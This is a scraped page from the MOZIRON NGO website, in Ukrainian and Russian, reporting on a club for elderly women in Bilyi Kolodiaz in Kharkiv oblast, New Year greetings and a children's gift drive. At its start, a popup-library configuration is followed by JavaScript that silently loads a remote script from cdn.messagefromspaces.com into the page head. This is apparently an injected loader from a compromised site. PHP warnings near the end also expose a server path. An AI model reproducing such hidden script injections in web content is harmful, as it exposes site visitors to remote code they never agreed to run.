, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Телефонний дзвінок з Харківщини — бадьора нотка й приємне спілкування. Це — лише радісні емоції, оптимістичний настрій і творчий запал. Телефонувала завідуюча й художній керівник Білоколодязького селищного Будинку культури Алевтина Василівна Омельяненко.

— У мене зібралося так багато інформації! Насамперед хочу сказати, що нам неймовірно пощастило на прекрасну землячку — Світлану Винограденко, голову правління Міжнародної громадської організації «МОЗІРОН» («Міжнародна організація за збереження і розвиток народу»). Особливо активна робота розпочалася восени минулого року. Якось, одного приїзду, Світлана звернула увагу на те, що жінкам поважного віку, які вже на заслуженому відпочинку й не працюють, самотньо й незатишно залишатися наодинці…

Ось тоді Світлана Винограденко й запропонувала міні-проект «Весела гостинна хата Білоколодязької громади». За кілька днів ми отримали в подарунок для земляків чашки для чаю, чайник, скатертини, серветки, чай, цукерки. Тільки так, за чашкою чаю при дружній бесіді можна об’єднати людей.

На першу зустріч «Веселої гостинної хати» прийшло 25 чоловік. Жінки заповнили анкету: вказали свої улюблені заняття. А вже через кілька днів у клубі завирувало життя.

Понеділок, хоч і вихідний, і, як кажуть, нелегкий день, у Білому Колодязі з цим категорично не згодні. Щопонеділка в Будинку культури збираються ті, хто любить грати у шахи, шахмати, доміно, лото, нарди. Алевтина Василівна уточнює, що набори ігр благочинно передала та ж Світлана Винограденко та її подруги Тетяна Дурнєва, Оксана Сохатська.

Щовівторка у «Хаті» курси англійської мови. Заняття проводить Алевтина Омельяненко (раніше вона викладала англійську мову в школі). (далее…)

 

Света в Душе! Нежной бережности в отошениях! Божией помощи в Делах Великих и Малых! 

Добрий день, любі жінки похилого віку всього світу!

Вступаючи в новий рік, нехай відкриються Ваші серця для нових знайомств, світлих почуттів та щасливих посмішок! Нові бажання та нові ідеї нехай збагатять Ваше життя та нададуть наснаги в роботі, в сім’ї. Щиро бажаємо Вам міцного здоров’я та перемоги у всіх Ваших починаннях. Нехай Бог благословить Вас і Ваші родини.

Бажаємо, щоб у Ваших оселях країни панували мир та злагода. З найкращими побажаннями звертаються до Вас жінки похилого віку (від 55 до 77 років) селища Білий Колодязь.

Селище міського типу Білий Колодязь розташоване на сході України у Вовчанському районі Харківської області та має населення, приблизно, 3500 людей, з яких більша частина – люди похилого віку. (далее…)

Международная общественная организация МОЗИРОН поздравляет всех своих друзей с Новым 2017 годом!

Мы провожаем прошедший год и благодарим его за то, что он дал нам - здоровье, любовь, счастье, друзей, семью, детей, изобилие (всё, что заслужили), и за то, что не дал (то, что нам не нужно). С надеждой и уверенностью встречаем Новый 2017 Год, и верим, что Год принесет только Светлое и Радостное

 

 

АКЦІЯ! УВАГА! АКЦІЯ! До дня Святого Миколая! Акцію Добра, розпочато!

Збір дитячих книжок, смаколиків та іграшок .

В подарунок дітям селища Білий колодязь на Харківщині. (далее…)

TRANSLATE

Russian to English Russian to German Russian to French Russian to Spanish Russian to Italian Russian to Japanese Russian to Chinese

Новости и События

Отзывы

 • Детская спортиная школа "Колос"

  Шановна Світлана Володимірівна! [img]http://moziron.org/wp-content/uploads/2016/12/viber-image_1.jpg[/img]
  Читать полностью...
  Оставлен 23 Дек 2016
 • Білоколодязький НВК

  Шановна Світлано Володимирівно! Вісловлюю вам щиру подяку за активну громадську позицію , вагомий внесок...
  Читать полностью...
  Оставлен 15 Дек 2016

ФОТОГАЛЕРЕЯ


Warning: array_merge() [function.array-merge]: Argument #1 is not an array in /home/elasto/moziron.org/www/wp-content/plugins/picasa-widget/picasa-widget.php on line 48

Warning: array_merge() [function.array-merge]: Argument #2 is not an array in /home/elasto/moziron.org/www/wp-content/plugins/picasa-widget/picasa-widget.php on line 48

Видео

 

Наши партнеры

Бориспільський дошкільний навчальний заклад (ясла-садок) комбінованого типу №2